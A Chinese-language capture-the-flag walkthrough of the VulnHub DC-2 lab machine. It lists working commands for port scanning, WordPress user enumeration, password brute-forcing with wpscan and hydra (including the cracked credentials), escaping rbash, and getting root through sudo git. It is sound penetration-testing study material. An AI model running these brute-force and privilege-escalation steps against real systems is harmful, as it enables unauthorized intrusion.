靶机下载地址:https://download.vulnhub.com/dc/DC-2.zip
kali ip
信息收集
使用nmap扫描靶机ip
nmap -sP 192.168.20.0/24
扫描开放端口
nmap -A -p 1-65535 192.168.20.133
发现80和7744端口开放
访问80端口
访问失败,发现dc-2的域名,将他添加到hosts文件中
访问后发现第一个flag
查看Wappalyzer发现的是 Wordpress 4.7.10 :
flag1中文含义
你通常的词表可能不起作用,所以相反,也许你只需要cewl。
密码越多越好,但有时您就是无法全部赢。
以一个人身份登录以查看下一个flag。
如果找不到,请以另一个身份登录。
使用dirb进行目录扫描
dirb http://dc-2/
访问发现登录界面
漏洞利用
使用wpscan(Wordpress的专用扫描器)来对网站进行扫描
wpscan --url http://dc-2/ -e u
发现了三个用户我们保存到user.txt中
利用cewl爬取密码
cewl dc-2 -w pass.txt#使用cewl生成密码保存在文件pass.txt中
用户名密码都有了,使用wpscan进行暴力破解
wpscan --url http://dc-2/ -U user.txt -P pass.txt
得到用户名密码
jerry / adipiscing
tom / parturient
登录jerry后台,后发现flag2
Flag 2:
If you can't exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.
如果你不能利用WordPress并走捷径,还有另一种方法。
希望你找到了另一个切入点。
这时候想到了7744为ssh端口尝试爆破用户名
hydra -L user.txt -P pass.txt 192.168.20.133 ssh -s 7744
得到ssh登录用户名密码ssh连接
提权
发现flag3.txt但是cat无法使用,但vi可以使用
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
可怜的老汤姆总是追着杰瑞。 也许他应该为他造成的所有压力而苏醒。
这里首先我们绕过一下rbash
tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a
$ /bin/bash
tom@DC-2:~$ export PATH=$PATH:/bin/
tom@DC-2:~$ export PATH=$PATH:/usr/bin/
根据flag3提示我们要切换为jerry用户
密码请见wpscan爆破出来的jerry密码,发现flag4.txt
根据flag4提示估计提权在git上,git提权有两种方法
sudo git -p help config
sudo git -p config --help
我是用第一种
输入!/bin/bash完成提权
完成任务